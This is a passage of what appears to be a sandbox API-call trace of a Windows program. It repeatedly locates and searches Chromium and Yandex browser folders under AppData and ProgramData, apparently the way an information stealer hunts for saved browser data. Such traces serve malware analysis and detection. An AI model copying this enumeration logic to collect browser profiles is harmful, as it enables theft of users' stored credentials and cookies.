[0163.897] lstrlenW (lpString="\\Chromium") returned 9 [0163.897] GetProcessHeap () returned 0x8e0000 [0163.898] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x30) returned 0x914be0 [0163.898] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.898] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Chromium" | out: lpString1="C:\\ProgramData\\Chromium") returned="C:\\ProgramData\\Chromium" [0163.898] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.898] GetProcessHeap () returned 0x8e0000 [0163.898] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.898] lstrlenW (lpString="C:\\ProgramData\\Chromium") returned 23 [0163.898] lstrlenW (lpString="C:\\ProgramData\\Chromium") returned 23 [0163.898] lstrlenW (lpString="\\*.*") returned 4 [0163.898] GetProcessHeap () returned 0x8e0000 [0163.898] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x38) returned 0x8f9a40 [0163.898] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Chromium" | out: lpString1="C:\\ProgramData\\Chromium") returned="C:\\ProgramData\\Chromium" [0163.898] lstrcatW (in: lpString1="C:\\ProgramData\\Chromium", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Chromium\\*.*") returned="C:\\ProgramData\\Chromium\\*.*" [0163.898] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Chromium\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x5c001e, ftLastAccessTime.dwHighDateTime=0x16, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.898] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.898] GetProcessHeap () returned 0x8e0000 [0163.898] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0163.898] VirtualQuery (in: lpAddress=0x914be0, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x914000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.898] GetProcessHeap () returned 0x8e0000 [0163.898] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x914be0 | out: hHeap=0x8e0000) returned 1 [0163.898] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.898] IStream:SetSize (This=0x9043c0, libNewSize=0x2ff) returned 0x0 [0163.898] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x2ff, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0163.899] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.899] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0163.899] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0163.899] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0x6, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.899] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.899] GetProcessHeap () returned 0x8e0000 [0163.899] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.899] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.899] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.899] lstrlenW (lpString="\\Yandex") returned 7 [0163.899] GetProcessHeap () returned 0x8e0000 [0163.899] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6a) returned 0x909f48 [0163.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.899] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Yandex" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex" [0163.899] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.899] GetProcessHeap () returned 0x8e0000 [0163.899] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.899] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex") returned 52 [0163.899] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex") returned 52 [0163.899] lstrlenW (lpString="\\*.*") returned 4 [0163.899] GetProcessHeap () returned 0x8e0000 [0163.899] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x72) returned 0x8efeb0 [0163.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex" [0163.899] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex\\*.*" [0163.899] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.900] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.900] GetProcessHeap () returned 0x8e0000 [0163.900] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.900] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.900] GetProcessHeap () returned 0x8e0000 [0163.900] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.900] GetProcessHeap () returned 0x8e0000 [0163.900] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.900] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.900] lstrlenW (lpString="\\Yandex") returned 7 [0163.900] GetProcessHeap () returned 0x8e0000 [0163.900] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x66) returned 0x911b98 [0163.900] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.900] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Yandex" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex" [0163.900] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.900] GetProcessHeap () returned 0x8e0000 [0163.900] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex") returned 50 [0163.900] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex") returned 50 [0163.900] lstrlenW (lpString="\\*.*") returned 4 [0163.900] GetProcessHeap () returned 0x8e0000 [0163.900] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6e) returned 0x909f48 [0163.900] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex" [0163.900] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex\\*.*" [0163.900] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.900] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.900] GetProcessHeap () returned 0x8e0000 [0163.900] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.900] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.901] GetProcessHeap () returned 0x8e0000 [0163.901] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0163.901] GetProcessHeap () returned 0x8e0000 [0163.901] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.901] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.901] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.901] lstrlenW (lpString="\\Yandex") returned 7 [0163.901] GetProcessHeap () returned 0x8e0000 [0163.901] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2c) returned 0x914be0 [0163.901] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.901] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Yandex" | out: lpString1="C:\\ProgramData\\Yandex") returned="C:\\ProgramData\\Yandex" [0163.901] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.901] GetProcessHeap () returned 0x8e0000 [0163.901] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.901] lstrlenW (lpString="C:\\ProgramData\\Yandex") returned 21 [0163.901] lstrlenW (lpString="C:\\ProgramData\\Yandex") returned 21 [0163.901] lstrlenW (lpString="\\*.*") returned 4 [0163.901] GetProcessHeap () returned 0x8e0000 [0163.901] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x34) returned 0x8f9a40 [0163.901] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Yandex" | out: lpString1="C:\\ProgramData\\Yandex") returned="C:\\ProgramData\\Yandex" [0163.901] lstrcatW (in: lpString1="C:\\ProgramData\\Yandex", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Yandex\\*.*") returned="C:\\ProgramData\\Yandex\\*.*" [0163.901] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Yandex\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x66001e, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.901] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.901] GetProcessHeap () returned 0x8e0000 [0163.901] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0163.901] VirtualQuery (in: lpAddress=0x914be0, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x914000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.901] GetProcessHeap () returned 0x8e0000 [0163.901] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x914be0 | out: hHeap=0x8e0000) returned 1 [0163.901] GetProcessHeap () returned 0x8e0000 [0163.901] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.901] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.901] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.902] lstrlenW (lpString="\\Yandex") returned 7 [0163.902] GetProcessHeap () returned 0x8e0000 [0163.902] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6a) returned 0x909f48 [0163.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.902] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Yandex" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex" [0163.902] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.902] GetProcessHeap () returned 0x8e0000 [0163.902] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex") returned 52 [0163.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex") returned 52 [0163.902] lstrlenW (lpString="\\*.*") returned 4 [0163.902] GetProcessHeap () returned 0x8e0000 [0163.902] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x72) returned 0x8efeb0 [0163.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex" [0163.902] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex\\*.*" [0163.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Yandex\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.902] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.902] GetProcessHeap () returned 0x8e0000 [0163.902] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.902] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.902] GetProcessHeap () returned 0x8e0000 [0163.902] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.902] GetProcessHeap () returned 0x8e0000 [0163.902] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.902] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.902] lstrlenW (lpString="\\Yandex") returned 7 [0163.902] GetProcessHeap () returned 0x8e0000 [0163.902] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x66) returned 0x911b98 [0163.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.903] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Yandex" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex" [0163.903] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.903] GetProcessHeap () returned 0x8e0000 [0163.903] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.903] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex") returned 50 [0163.903] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex") returned 50 [0163.903] lstrlenW (lpString="\\*.*") returned 4 [0163.903] GetProcessHeap () returned 0x8e0000 [0163.903] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6e) returned 0x909f48 [0163.903] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex" [0163.903] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex\\*.*" [0163.903] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Yandex\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.903] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.903] GetProcessHeap () returned 0x8e0000 [0163.903] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.903] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.903] GetProcessHeap () returned 0x8e0000 [0163.903] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0163.903] GetProcessHeap () returned 0x8e0000 [0163.903] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.903] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.903] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.903] lstrlenW (lpString="\\Yandex") returned 7 [0163.903] GetProcessHeap () returned 0x8e0000 [0163.903] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2c) returned 0x914be0 [0163.903] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.903] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Yandex" | out: lpString1="C:\\ProgramData\\Yandex") returned="C:\\ProgramData\\Yandex" [0163.903] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.903] GetProcessHeap () returned 0x8e0000 [0163.903] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.903] lstrlenW (lpString="C:\\ProgramData\\Yandex") returned 21 [0163.904] lstrlenW (lpString="C:\\ProgramData\\Yandex") returned 21 [0163.904] lstrlenW (lpString="\\*.*") returned 4 [0163.904] GetProcessHeap () returned 0x8e0000 [0163.904] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x34) returned 0x8f9a40 [0163.904] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Yandex" | out: lpString1="C:\\ProgramData\\Yandex") returned="C:\\ProgramData\\Yandex" [0163.904] lstrcatW (in: lpString1="C:\\ProgramData\\Yandex", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Yandex\\*.*") returned="C:\\ProgramData\\Yandex\\*.*" [0163.904] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Yandex\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x5c001e, 